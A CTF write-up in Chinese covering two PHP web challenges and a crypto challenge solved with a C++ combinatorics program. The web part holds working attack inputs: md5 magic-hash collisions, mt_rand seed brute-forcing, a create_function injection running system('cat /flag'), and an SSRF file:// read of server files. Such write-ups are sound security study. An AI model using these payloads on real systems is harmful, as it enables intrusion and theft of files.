yjs writeup 交界地四大高手
[toc]
web
very_easyphp
套娃题,第一层
// First layer of the challenge: three gates that must all pass before $week1 is set.
//   1. $han (the basename of the `query` parameter) must contain NO letter, digit
//      or underscore — preg_match() returns 1 as soon as a single such character
//      is present, so the check rejects on presence, not on "all characters".
//   2. $a must be a string and $b numeric.
//   3. $a and $b differ but their md5 digests compare equal under loose `==`.
//      Loose comparison treats digests of the form "0e<digits>" as the number 0,
//      which is why this gate is weak; `===` (or hash_equals()) would not be.
$han = basename($data['query']);
$a = $_GET['a'];
$b = $_GET['b'];
if (preg_match('/[a-z0-9_]/i', $han)) {
    echo "这些都被过滤了哦<br />";
} elseif (!(is_string($a) && is_numeric($b))) {
    echo "不要耍小聪明哦<br />";
} elseif ($a != $b && md5($a) == md5($b)) {
    $week1 = true;
} else {
    echo "你行不行,细狗;<br />";
}
query直接最后加一个&z=/-就能过
a和b这里使用0e hash即可绕过==比较
a=QNKCDZO&b=240610708
然后随机数部分可以直接爆破7位数的种子来进行预测
// Seed recovery: the generator is seeded from a 7-digit value, so the whole
// seed space (10^7) is small enough to enumerate. Every candidate whose first
// mt_rand() output equals $hint is printed.
// NOTE(review): this is exactly why mt_rand() must never guard anything
// security-relevant — use random_int() / random_bytes() for tokens and secrets.
$candidate = 0;
while ($candidate <= 9999999) {
    mt_srand($candidate);
    $first = mt_rand();
    if ($first == $hint) {
        echo($candidate);
    }
    $candidate++;
}
预测第102个随机数为sui
// Replay the recovered seed: the 1st output is printed, outputs 2..101 are
// discarded, and the 102nd output is the predicted value of $sui.
$seed = 1728445;
mt_srand($seed);
echo(mt_rand());
echo("\n");
for ($skip = 0; $skip < 100; $skip++) {
    mt_rand();
}
$sui = mt_rand();
echo($sui);
参数d直接给10001就能过
最后命令执行直接用create_function绕过
flag=\create_function&e=}system('cat /flag');//

sssrf
任意文件读
url=file:///var/www/html/flag.php
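<?php
/**
 * Database mysql
 *
 * Looks up the POSTed `id` in `users` and answers only "success" (a row
 * matched) or "error". Served solely to requests whose REMOTE_ADDR is
 * 127.0.0.1.
 *
 * NOTE(review): REMOTE_ADDR alone is not an authorization boundary — any
 * request the server makes to itself (the SSRF used in this writeup) also
 * arrives from 127.0.0.1 and is accepted.
 */
error_reporting(0);
$flag = getenv("FLAG");
// NOTE(review): hard-coded root credentials; a real deployment should read
// them from the environment or a config file outside the web root.
$db_host = "127.0.0.1";
$db_user = "root";
$db_pass = "root";
$db_name = "ctf";
$conn = mysqli_connect($db_host, $db_user, $db_pass, $db_name);
if (!$conn) {
    die("connect error: " . mysqli_connect_error());
}
if ($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
    if (isset($_POST["id"])) {
        $id = $_POST['id'];
        // Fix: `id` is attacker-controlled and was interpolated straight into
        // the statement (SQL injection). Bind it as a parameter instead so it
        // can only ever be compared as a value, never change the query shape.
        $sql = "select * from users where id=?";
        $err = TRUE;
        $err_msg = "";
        $stmt = mysqli_prepare($conn, $sql);
        if ($stmt !== false
            && mysqli_stmt_bind_param($stmt, "s", $id)
            && mysqli_stmt_execute($stmt)
            && mysqli_stmt_store_result($stmt)) {
            // Same outcome as the original single fetch: error iff no row matched.
            $err = (mysqli_stmt_num_rows($stmt) === 0);
        } else {
            $err_msg = ($stmt !== false) ? mysqli_stmt_error($stmt) : mysqli_error($conn);
        }
        if ($stmt !== false) {
            mysqli_stmt_close($stmt);
        }
    }
    mysqli_close($conn);
    if (isset($_POST["id"])) {
        // Only the parameterised template is echoed; the submitted value is
        // never reflected back into the page.
        echo $sql;
        if ($err) {
            echo "error";
        } else {
            echo "success";
        }
    } else {
        die('请输入搜索的id值');
    }
} else {
    die('非本地用户,禁止访问');
}
?>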
#!/bin/bash
# Container entrypoint: bring MySQL up, seed it once, then hand over to Apache.
#
# NOTE(review): the root password is passed on the command line (-proot /
# --password=root) and is therefore visible in the process list; a client
# options file would avoid that.

# Clear stale socket artefacts left behind by a previous run.
rm -rf /var/run/mysqld/mysqld.sock.lock
rm -rf /tmp/mysql.sock
usermod -d /var/lib/mysql/ mysql
ln -s /var/lib/mysql/mysql.sock /tmp/mysql.sock
chown -R mysql:mysql /var/lib/mysql

# Start the server in the background; the loop below waits until it answers.
mysqld_safe &

# Exit status 0 once mysqld replies to a ping on its socket.
mysql_ready() {
    mysqladmin ping --socket=/run/mysqld/mysqld.sock --user=root --password=root > /dev/null 2>&1
}

until mysql_ready; do
    echo "waiting for mysql ..."
    sleep 3
done

mysql -e "ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'root';flush privileges;" -uroot -proot

# One-shot seed: import the dump, then delete it so it cannot be read later.
if [[ -f /db.sql ]]; then
    mysql -e "source /db.sql" -uroot -proot
    rm -f /db.sql
fi

# Sourced (not executed), so anything it defines stays in this shell and is
# inherited by apache2-foreground.
if [[ -f /flag.sh ]]; then
    source /flag.sh
fi

apache2-foreground
发现可以直接读start.sh,从而发现flag.sh和dflag文件
读dflag获取flag

crypto
CryptoLight
CF上的原题,可以直接搜到代码

#include<bits/stdc++.h>
using namespace std;
#define MAXN 200005
#define lowbit(x) (x&-x)
#define reg register
#define mkpr make_pair
#define fir first
#define sec second
// Integer aliases used by the helpers below.
using LL = long long;
using uLL = unsigned long long;
constexpr LL INF = 0x3f3f3f3f3f3f3f3f;
constexpr int mo = 1e9 + 7;          // prime modulus for all arithmetic below
constexpr int zero = 500;
constexpr LL jzm = 2333;
// NOTE(review): 3 * 332748118 == 998244354, so invG inverts orG modulo
// 998244353, not modulo mo; neither is used in this file.
constexpr int orG = 3, invG = 332748118;
const double Pi = std::acos(-1.0);   // acos is not constexpr, so this stays a runtime constant
using pii = std::pair<int, int>;
const double PI = std::acos(-1.0);   // duplicate of Pi, kept for compatibility
// Absolute value for any type that supports `< 0` and unary minus.
template<typename _T>
_T Fabs(_T x){
    if (x < 0) {
        return -x;
    }
    return x;
}
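// Reads one signed decimal integer from stdin into x. Leading non-digit bytes
// are skipped; a '-' seen anywhere in that leading run negates the result.
// The byte following the last digit is consumed.
// Fix: getchar() is kept as an int so EOF (-1) is recognised; the original
// stored it in a char, where it never matches a digit, and spun forever.
template<typename _T>
void read(_T &x){
    _T sign = 1;
    x = 0;
    int c = getchar();
    while (c != EOF && (c > '9' || c < '0')) {
        if (c == '-') sign = -1;
        c = getchar();
    }
    while (c != EOF && '0' <= c && c <= '9') {
        x = x * 10 + (c - '0');   // same as (x<<3)+(x<<1)+(c^48)
        c = getchar();
    }
    x *= sign;
}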
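// Writes a non-negative magnitude in decimal, most significant digit first.
template<typename _T>
static void print_digits(_T mag){
    if (mag > 9) print_digits(mag / 10);
    putchar(static_cast<int>(mag % 10) + '0');
}
// Writes x to stdout in decimal with a leading '-' for negatives.
// Fix: the magnitude is taken in the unsigned counterpart of _T, so the most
// negative value (e.g. INT_MIN) no longer overflows when it is negated.
template<typename _T>
void print(_T x){
    using U = typename std::make_unsigned<_T>::type;
    U mag;
    if (x < 0) {
        putchar('-');
        mag = U(0) - static_cast<U>(x);   // well-defined wrap-around on unsigned
    } else {
        mag = static_cast<U>(x);
    }
    print_digits(mag);
}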
// Modular addition for operands already reduced into [0, mo).
int add(int x,int y){
    const int sum = x + y;
    return (sum >= mo) ? sum - mo : sum;
}
// Input: t test cases, each giving n and k. The tables are filled by init().
int t, n, k;
int pow2[MAXN];   // pow2[i] = 2^i mod mo
int fac[MAXN];    // fac[i]  = i! mod mo
int f[MAXN];      // f[i]    = modular inverse of i
int inv[MAXN];    // inv[i]  = (i!)^-1 mod mo
int ans;          // accumulator for the current test case
// Binary exponentiation: a^s mod mo. (Unused by main in this file.)
int qkpow(int a,int s){
    long long base = a;
    long long result = 1;
    while (s) {
        if (s & 1) result = result * base % mo;
        base = base * base % mo;
        s >>= 1;
    }
    return static_cast<int>(result);
}
// Fills pow2 / fac / f / inv for indices 0..1e5: powers of two, factorials,
// modular inverses of 1..1e5 via the linear recurrence, and inverse factorials.
// NOTE(review): only indices <= 1e5 are initialised although the arrays hold
// MAXN entries; callers must keep n within that bound.
void init(){
    const int limit = 100000;
    pow2[0] = 1;
    for (int i = 1; i <= limit; ++i) {
        pow2[i] = 2ll * pow2[i - 1] % mo;
    }
    fac[0] = fac[1] = 1;
    f[1] = 1;
    inv[0] = inv[1] = 1;
    for (int i = 2; i <= limit; ++i) {
        fac[i] = 1ll * i * fac[i - 1] % mo;
        f[i] = 1ll * (mo - mo / i) * f[mo % i] % mo;   // inverse of i, mo % i < i is already known
        inv[i] = 1ll * inv[i - 1] * f[i] % mo;
    }
}
// Binomial coefficient C(x, y) mod mo; 0 whenever the arguments are out of range.
int C(int x,int y){
    const bool out_of_range = (x < y) || (x < 0) || (y < 0);
    if (out_of_range) return 0;
    long long r = 1ll * fac[x] * inv[y] % mo;
    r = r * inv[x - y] % mo;
    return static_cast<int>(r);
}
// Reads t cases of (n, k) and prints, for each, the summed term plus one.
signed main(){
    read(t);
    init();
    while (t--) {
        read(n);
        read(k);
        ans = 0;
        // i runs while i <= n and (i-1)*(k-1) still fits in n.
        for (int i = 1; i <= n; ++i) {
            if ((i - 1) * (k - 1) > n) break;
            long long term = 1ll * C(n - (i - 1) * (k - 1), i) * fac[i] % mo;
            term = term * inv[n] % mo;
            term = term * fac[n - i] % mo;
            ans = add(ans, static_cast<int>(term));
        }
        printf("%d\n", add(ans, 1));
    }
    return 0;
}
把题目数据输入进去拼起来获取flag
